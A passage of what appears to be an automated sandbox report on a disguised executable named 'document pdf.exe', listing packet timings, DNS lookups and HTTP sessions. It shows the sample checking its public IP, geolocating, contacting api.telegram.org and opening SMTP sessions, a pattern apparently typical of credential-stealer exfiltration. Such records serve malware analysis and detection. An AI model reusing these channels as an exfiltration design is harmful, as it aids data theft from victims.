                                                                                                                      Jan 6, 2025 16:01:19.227509022 CET8049795132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:19.227580070 CET4979580192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:19.228316069 CET8049807132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:19.228401899 CET4980780192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:19.228496075 CET4980780192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:19.233225107 CET8049807132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.002355099 CET8049807132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.004267931 CET49813443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:20.004312992 CET44349813188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.004378080 CET49813443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:20.004705906 CET49813443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:20.004724026 CET44349813188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.042459011 CET4980780192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:20.489613056 CET44349813188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.492687941 CET49813443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:20.492721081 CET44349813188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.650108099 CET44349813188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.650182009 CET44349813188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.650249004 CET49813443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:20.650846958 CET49813443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:20.655106068 CET4980780192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:20.656398058 CET4981980192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:20.660139084 CET8049807132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.660223961 CET4980780192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:20.661267042 CET8049819132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.661338091 CET4981980192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:20.661452055 CET4981980192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:20.666183949 CET8049819132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:21.534334898 CET8049819132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:21.535761118 CET49825443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:21.535813093 CET44349825188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:21.535890102 CET49825443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:21.536237955 CET49825443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:21.536252975 CET44349825188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:21.589376926 CET4981980192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:22.018743038 CET44349825188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:22.020756960 CET49825443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:22.020791054 CET44349825188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:22.185461998 CET44349825188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:22.185532093 CET44349825188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:22.185579062 CET49825443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:22.186455011 CET49825443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:22.190324068 CET4981980192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:22.191492081 CET4983080192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:22.195310116 CET8049819132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:22.195453882 CET4981980192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:22.196315050 CET8049830132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:22.196405888 CET4983080192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:22.196525097 CET4983080192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:22.201277018 CET8049830132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.151318073 CET8049830132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.153719902 CET49841443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:24.153750896 CET44349841188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.153829098 CET49841443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:24.154232025 CET49841443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:24.154242992 CET44349841188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.198738098 CET4983080192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:24.616772890 CET44349841188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.618767023 CET49841443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:24.618788958 CET44349841188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.757488966 CET44349841188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.757556915 CET44349841188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.757666111 CET49841443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:24.758250952 CET49841443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:24.772551060 CET4983080192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:24.777749062 CET8049830132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.777929068 CET4983080192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:24.781382084 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:24.781424046 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.781488895 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:24.781955957 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:24.781970024 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.419817924 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.419944048 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:25.422080040 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:25.422091007 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.422355890 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.423873901 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:25.467339039 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.666327953 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.666400909 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.666457891 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:25.671247005 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:31.135541916 CET4975680192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:31.315087080 CET49890587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:31.319930077 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:31.320003033 CET49890587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:32.010430098 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:32.010634899 CET49890587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:32.015398026 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:32.162626982 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:32.163796902 CET49890587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:32.168663025 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:32.318629026 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:32.318988085 CET49890587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:32.323811054 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:32.482357979 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:32.482727051 CET49890587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:32.487518072 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:32.636765957 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:32.642741919 CET49890587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:32.647547960 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:32.811463118 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:32.815440893 CET49890587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:32.820560932 CET58749890208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:32.820739031 CET49890587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:34.327042103 CET49910587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:34.331988096 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:34.332070112 CET49910587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:34.888252020 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:34.888520956 CET49910587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:34.893395901 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:35.041076899 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:35.041270971 CET49910587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:35.046133995 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:35.193973064 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:35.194879055 CET49910587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:35.199631929 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:35.350573063 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:35.353735924 CET49910587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:35.358568907 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:35.505721092 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:35.508920908 CET49910587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:35.513730049 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:35.675283909 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:35.676799059 CET49910587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:35.681734085 CET58749910208.91.199.225192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:35.681806087 CET49910587192.168.2.6208.91.199.225
                                                                                                                      Jan 6, 2025 16:01:36.284513950 CET5171853192.168.2.6162.159.36.2
                                                                                                                      Jan 6, 2025 16:01:36.289339066 CET5351718162.159.36.2192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:36.289434910 CET5171853192.168.2.6162.159.36.2
                                                                                                                      Jan 6, 2025 16:01:36.294322014 CET5351718162.159.36.2192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:36.741638899 CET5171853192.168.2.6162.159.36.2
                                                                                                                      Jan 6, 2025 16:01:36.746630907 CET5351718162.159.36.2192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:36.746689081 CET5171853192.168.2.6162.159.36.2

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 6, 2025 16:01:09.422313929 CET5700153192.168.2.61.1.1.1
                                                                                                                      Jan 6, 2025 16:01:09.429550886 CET53570011.1.1.1192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:11.347264051 CET4978253192.168.2.61.1.1.1
                                                                                                                      Jan 6, 2025 16:01:11.354531050 CET53497821.1.1.1192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.773298979 CET5557353192.168.2.61.1.1.1
                                                                                                                      Jan 6, 2025 16:01:24.780596018 CET53555731.1.1.1192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:31.303633928 CET5444553192.168.2.61.1.1.1
                                                                                                                      Jan 6, 2025 16:01:31.314274073 CET53544451.1.1.1192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:36.283829927 CET5364147162.159.36.2192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:36.752532959 CET5796953192.168.2.61.1.1.1
                                                                                                                      Jan 6, 2025 16:01:36.759881020 CET53579691.1.1.1192.168.2.6

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Jan 6, 2025 16:01:09.422313929 CET192.168.2.61.1.1.10x46dbStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:11.347264051 CET192.168.2.61.1.1.10xd2daStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:24.773298979 CET192.168.2.61.1.1.10xf2abStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:31.303633928 CET192.168.2.61.1.1.10x8932Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:36.752532959 CET192.168.2.61.1.1.10xb848Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Jan 6, 2025 16:01:06.648171902 CET1.1.1.1192.168.2.60xd065No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:06.648171902 CET1.1.1.1192.168.2.60xd065No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:09.429550886 CET1.1.1.1192.168.2.60x46dbNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:09.429550886 CET1.1.1.1192.168.2.60x46dbNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:09.429550886 CET1.1.1.1192.168.2.60x46dbNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:09.429550886 CET1.1.1.1192.168.2.60x46dbNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:09.429550886 CET1.1.1.1192.168.2.60x46dbNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:09.429550886 CET1.1.1.1192.168.2.60x46dbNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:11.354531050 CET1.1.1.1192.168.2.60xd2daNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:11.354531050 CET1.1.1.1192.168.2.60xd2daNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:24.780596018 CET1.1.1.1192.168.2.60xf2abNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:31.314274073 CET1.1.1.1192.168.2.60x8932No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:31.314274073 CET1.1.1.1192.168.2.60x8932No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:31.314274073 CET1.1.1.1192.168.2.60x8932No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:31.314274073 CET1.1.1.1192.168.2.60x8932No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                      Jan 6, 2025 16:01:36.759881020 CET1.1.1.1192.168.2.60xb848Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • reallyfreegeoip.org
                                                                                                                      • api.telegram.org
                                                                                                                      • checkip.dyndns.org

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.649731132.226.8.169802672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 6, 2025 16:01:09.454629898 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 6, 2025 16:01:11.017657042 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:10 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                      Jan 6, 2025 16:01:11.027211905 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 6, 2025 16:01:11.280863047 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:11 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                      Jan 6, 2025 16:01:12.210125923 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 6, 2025 16:01:12.477199078 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:12 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.649756132.226.8.169802672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 6, 2025 16:01:13.103512049 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 6, 2025 16:01:14.221856117 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:14 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.649772132.226.8.169802672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 6, 2025 16:01:14.857208014 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 6, 2025 16:01:15.638887882 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:15 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.649784132.226.8.169802672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 6, 2025 16:01:16.247406006 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 6, 2025 16:01:17.113532066 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:16 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.649795132.226.8.169802672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 6, 2025 16:01:17.751070976 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 6, 2025 16:01:18.564538956 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:18 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.649807132.226.8.169802672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 6, 2025 16:01:19.228496075 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 6, 2025 16:01:20.002355099 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 06 Jan 2025 15:01:19 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.649819132.226.8.169802672C:\Users\user\Desktop\document pdf.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 6, 2025 16:01:20.661452055 CET151OUTGET / HTTP/1.1
